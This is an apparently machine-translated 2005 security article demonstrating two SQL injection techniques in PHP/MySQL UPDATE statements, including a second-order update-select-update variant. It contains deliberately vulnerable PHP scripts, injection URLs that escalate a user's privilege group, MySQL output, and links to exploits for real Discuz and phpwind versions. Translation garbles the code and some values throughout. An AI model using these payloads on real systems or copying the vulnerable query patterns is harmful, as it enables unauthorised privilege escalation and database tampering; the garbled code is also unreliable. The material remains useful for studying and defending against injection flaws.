Two UPDATE injection modes (mysql + php)
Text/security Angel SuperHei 2005.8.11
I. test environment:
OS: Windows XP sp2
Php: php 4.3.10 (
Mysql 4.1.9
Apache 1.3.33
2. Test the database structure:
----- Start ---
-- Database: 'test'
--
----------------------------------------------------------
--
-- Table structure 'userinfo'
--
Create table 'userinfo '(
'Groudid' varchar (12) not null default '1 ',
'User' varchar (12) not null default 'gigie ',
'Pass' varchar (122) not null default '123'
) ENGINE = MyISAM default charset = latin1;
--
-- Export the table data 'userinfo'
--
Insert into 'userinfo' VALUES ('2', 'heigi', '20140901 ');
------ End -------
Iii. Test Mode:
1. The variable does not contain ''or" "[MOD1]
<? Php
// Test1.php Mod1
$ Servername = "localhost ";
$ Dbusername = "root ";
$ Dbpassword = "";
$ Dbname = "test ";
Mysql_connect ($ servername, $ dbusername, $ dbpassword) or die ("database connection failed ");
$ SQL = "update userinfo set pass = $ p where user = 'gigie'"; // <-- $ P no single quotes
$ Result = mysql_db_query ($ dbname, $ SQL );
$ Userinfo = mysql_fetch_array ($ result );
Echo "<p> SQL Query: $ SQL <p> ";
?>
The script only modifies the pass of user = 'gigie'. If groudid indicates the user's permission level, we aim to achieve this by constructing $ p.
To modify the groupid:
Then we submit: http: // 127.0.0.1/test1.php? P = 123456, groudid = 1
Query in mysql:
Mysql> select * from userinfo;
+ --------- + ------- + -------- +
| Groudid | user | pass |
+ --------- + ------- + -------- +
| 1 | heige | 123456 |
+ --------- + ------- + -------- +
1 row in set (0.01 sec)
The groudid of user heige is changed to 1 in another 2.
Therefore, we can get the injection without ''or" "update", which is our mode 1.
2. variables include ''or" "[MOD2]
<? Php
// Test2.php
$ Servername = "localhost ";
$ Dbusername = "root ";
$ Dbpassword = "";
$ Dbname = "test ";
Mysql_connect ($ servername, $ dbusername, $ dbpassword) or die ("database connection failed ");
$ SQL = "update userinfo set pass = '$ P' where user = 'gigie'"; // <-- $ p use single quotes
$ Result = mysql_db_query ($ dbname, $ SQL );
$ Userinfo = mysql_fetch_array ($ result );
Echo "<p> SQL Query: $ SQL <p> ";
?>
To disable 'construct $ p should be 123456 ', groudid = '2 submit:
Http: // 127.0.0.1/test2.php? P = 123456 ', groudid = '1 in the case of gpc = on' changed \'
The submitted statement becomes: SQL Query: update userinfo set pass = '2017 \ ', groudid = \ '1' where user = 'gigie'
Mysql query:
Mysql> select * from userinfo;
+ --------- + ------- + -------------------- +
| Groudid | user | pass |
+ --------- + ------- + -------------------- +
| 2 | heige | 123456 ', groudid = '1 |
+ --------- + ------- + -------------------- +
1 row in set (0.00 sec)
Groudid is not modified. So when the variable is 'or "", is it completely not injected? The following figure shows the Mode 2:
<? Php
// Test3.php Mod2
$ Servername = "localhost ";
$ Dbusername = "root ";
$ Dbpassword = "";
$ Dbname = "test ";
Mysql_connect ($ servername, $ dbusername, $ dbpassword) or die ("database connection failed ");
$ SQL = "update userinfo set pass = '$ P' where user = 'gigie'"; // <-- $ p use single quotes
$ Result = mysql_db_query ($ dbname, $ SQL );
Mysql_fetch_array ($ result); // write data of $ p to the database
$ SQL = "select pass from userinfo where user = 'gigie '";
$ Result = mysql_db_query ($ dbname, $ SQL );
$ Userinfo = mysql_fetch_array ($ result );
Echo $ userinfo [0]; // output the pass query to $ userinfo [0]
$ SQL = "update userinfo set pass = '$ userinfo [0] 'where user = 'gigie '";
$ Result = mysql_db_query ($ dbname, $ SQL );
Mysql_fetch_array ($ result); // update $ userinfo [0] Again
?>
In our test, submit: http: // 127.0.0.1/test3.php? P = 123456 ', groudid = '1
Go back to mysql for query:
Mysql> select * from userinfo;
+ --------- + ------- + -------- +
| Groudid | user | pass |
+ --------- + ------- + -------- +
| 1 | heige | 123456 |
+ --------- + ------- + -------- +
1 row in set (0.00 sec)
HaHa ~~ The groudid is modified to 1 after successful injection. This is our model 2, which is briefly described as follows:
Update --> select --> update
Iv. Actual Mode
Mode 1: Discuz 2.0/2.2 register. php Injection
Vulnerability Analysis: http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register. php Remote Exploit: http://4ngel.net/project/discuz_reg.htm
Mode 2: phpwind 2.0.2 and 3.31e permission Escalation Vulnerability
Vulnerability Analysis:
Update (the profile. php injection variable is in the $ proicon update statement, icon = '$ userdb [icon]')
V
Select (jop. php)
V
Updtate (jop. php)
Exploit: http://www.huij.net/9xiao/up/phpwind-exploit.exe
5. Thanks
I am particularly grateful to saiy and other friends for their discussions and help. Thanks !!!